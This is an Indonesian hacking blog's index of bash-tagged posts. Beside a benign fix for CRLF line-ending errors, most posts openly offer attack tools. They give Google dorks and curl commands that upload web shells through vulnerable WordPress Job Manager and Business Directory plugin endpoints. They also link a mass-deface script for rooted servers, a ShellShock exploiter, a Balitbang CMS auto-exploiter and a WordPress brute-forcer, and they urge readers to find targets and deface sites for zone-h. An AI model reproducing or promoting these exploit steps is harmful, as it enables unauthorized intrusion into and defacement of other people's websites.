Codes Xploit: bash
Pages
Showing posts with label bash. Show all posts
Showing posts with label bash. Show all posts

Memperbaiki Error "/bin/bash^M: bad interpreter" Pada Saat Menjalankan File Bash

 
Halo selamat pagi agan agan semua.
Sesuai judul, disini saya akan memberikan beberapa solusi jika terdapat error semacam /bin/bash^M: bad interpreter pada saat menjalankan file bash.


Error ini terjadi karena file terdapat line style ending "\r\n". Sebenarnya, pada linux line style ending yang benar adalah  "\n" saja, sedangkan "\r\n" terdapat pada DOS/Windows. Jadi jika kalian menjalankan file yang mengandung line style ending "\r\n" pada linux, maka sudah pasti akan terdapat error semacam itu. Untuk lebih jelasnya, coba kalian run file bash kalian seperti ini:

user@linux $ bash file.sh
atau
user@linux $ sh file.sh

Kalian akan mendapati error seperti ini:


Beberapa cara yang dapat kalian lakukan untuk memperbaiki ini adalah sebagai berikut.

  • Menggunakan command tr
user@linux $ tr -d "\r" < file.sh > file_fix.sh && rm -rf file.sh
Nantinya file.sh akan dibersikan (dihapus \r), lalu di write ke dalam file baru bernama file_fix.sh yang nantinya inilah file yang akan kalian jalankan.
user@linux $ ./file_fix.sh

  • Menggunakan command sed
user@linux $ sed -i -e "s/\r$//" file.sh

  • Menggunakan command dos2unix
user@linux $ dos2unix file.sh
Jika dos2unix belum ada pada linux kalian, installah terlebih dahulu. Kalian bisa cari referensi untuk menginstall dos2unix pada linux kalian masing-masing di google.


Oke sekian dulu, itu adalah beberapa cara yang bisa kalian lakukan untuk memperbaiki error dari /bin/bash^M: bad interpreter. 

Semoga bermanfaat .

Simple Tools for Website Information Gathering

 
Halo, kali ini saya akan membagikan sebuah tools sederhana yang digunakan untuk Information Gathering sebuah website. Tools ini akan otomatis mengambil informasi:

- IP Address
- Hostname
- NameServer & Mail Server
- Scan Range IP 1-255 dan deteksi Hostname dari tiap IP nya.


Tools ini dibuat dengan bahasa program BASH. Jadi jika kalian menggunakan OS Windows, installah bash terlebih dahulu, akan mudah jika kalian menggunakan Windows 10 yang sudah terintegrasi Bash Ubuntu. 





Cara menggunakan:
------------------------------------------
user@linux $ wget https://pastebin.com/raw/5njuKAZ1 -O file.sh
user@linux $ chmod +x file.sh
user@linux $ ./file.sh
------------------------------------------

Oke sekian dulu.

WordPress Plugin Job Manager File Upload

 
Exploit Title: WordPress Plugin Job Manager File Upload
Google Dork: inurl:/wp-content/uploads/job-manager-uploads/
Vuln Path: /jm-ajax/upload_file

Example:
www.target.com/jm-ajax/upload_file/
( Vuln Target )

Exploit:
1. CSRF

2. CURL POST
root # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"


Upload file anda dengan format .gif/.jpg/.png





Script:
https://pastebin.com/hp0jJr1g [PHP][CLI Based]
https://pastebin.com/FaACEDLg [BASH]


Ayo kawan kita boom zone-h sebelum dir upload di banned lagi.

WordPress Business Directory Plugin File Upload

 

Exploit Title: WordPress Business Directory Plugin File Upload
Author: Jingklong ( Bahari Trouble Maker )



Google Dork: inurl:/wp-content/ inurl:/business-directory-plugin
Vuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

Example Target:
http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

( Vuln Target )
Exploit:
1. CSRF


2. CURL POST
root # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"

Uplod file anda dengan format .gif/.jpg/.png

Hasil upload anda bisa dicari di:
http://target.com//wp-content/uploads/2017/06/shell.gif


Download:
Auto Exploit (BASH): https://pastebin.com/Wk904pU9


Oke, selamat mencari target :D

Mass Deface (root) Bash Script

 
Okee, Setelah sekian lama bingung mau posting apa, karena gaada yang menarik akhir-akhir ini :v.
kali ini gua akan share tools untuk Mass Deface setelah kita mendapatkan akses root pada website.

Cara Pakai:
- ./mass file_deface
ex: ./mass pwn.txt
Tools ini memudahkan kita untuk men-deface seluruh domain dalam 1 Server. Tentunya, untuk menjalankan File ini kita harus terlebih dulu me-root servernya, cara nya bisa kalian dapatkan di Google
Link Tools: http://pastebin.com/E7zXjkWJ
Oke sekian dulu kawan, tetap berkarya walaupun kita pemula hahahaha :D

Import Semua PPA GPG Keys Launchpad yang Hilang dengan Launchpad-Getkeys

 
Kali ini kita akan membahas cara mengimport missing gpg keys launchpad. Biasanya itu terjadi saat kalian lama tidak melakukan update sistem Ubuntu. Sehingga saat diupdate banyak terjadi missing. Nah, pasti bakal capek kalau harus restore satu satu, kita bisa menggunakan Launchpad-Getkeys.
Read More

Cara Mudah Cek Spesifikasi Hardware dan Sistem di Ubuntu dengan Inxi

 
Inxi adalah sebuah script bash yang digunakan untuk melihat informasi sistem maupun hardware yang kita pakai. Aplikasi ini dibuat sudah tersedia di banyak distro. Inxi sendiri merupakan rewrite dari script 'infobash'.
Read More

ShellShock Exploit ( WebBased )

 
Oke sebelumnya thanks buat Evoo, yang udah membuka referensi alur exploitnya.
walaupun ini exploit lama, tapi gapapa apa salahnya di pelajarin.
oke langsung aja.
yakk ini dia sumber sedikit biar paham dulu => http://utekno.com/apakah-itu-shellshock-8349

okee jika sudah dipahami dengan benar, ini dia codenya ( versi web/webbased )
Single Xploit: http://adf.ly/1ajh3I
Auto Xploit [ update ]: http://adf.ly/1ampHK
cara pakenyaa:
1. Masukan target seperti di ss .
2. Masukan Command Linux nyaa ( contoh: uname -a/uname -rv/pwd. etc )
* kalo kalian paham command linux dasar, gua rasa gaada masalah ^_^
* pelajarin command linux :D

Video Tutorial: https://www.youtube.com/watch?v=58CxkOrB8Vg

Auto Exploiter Balitbang [Bash]

 
gila nih project sebenernya udh lama bgt,
tapi baru bisa gw selesain sekarang -,-


kali ini gw akan membagikan auto exploiter CMS Balitbang versi bash.
gw rasa lebih cepet dibanding yg versi PHP



bahan - bahan:

balit.sh => http://pastebin.com/8sCLNgDf
tambahin ini di shell kalian => http://pastebin.com/XYhgUC44
file pepesan harus ada kata Hacked.
format list target: site.com site.org site.net

videonya..
https://youtu.be/D1KS1S_2Zyk


##.

Bruteforce Wordpress Versi Bash

 
Bruteforce Wordpress Versi Bash..

akhirnya jadi juga,  bisa dibilang ini projek pertama ane pd bhs bash..

yaitu Bruteforce Wordpress vers bash.

udh ada auto detek 404,403, Mod_Security.
untuk apaan sih gan...

biasanya website masang security untuk tidak login secara terus menerus, alhasil jadi error tsb.
karena udh ada auto detek, jadi ketika muncul error tsb, mk otomatis akan ke target selanjutnya..


thx: sohai, jenn, fahmi, cdg


yaudah langsung aja.. 
jadi wp_brute.sh 

command:
bash wp_brute.sh

##.


Subscribe to Newsletter

Popular Posts

© Copyright 2017 Codes Xploit. Designed by Infinite Haxor. Distributed by Infinite Haxor.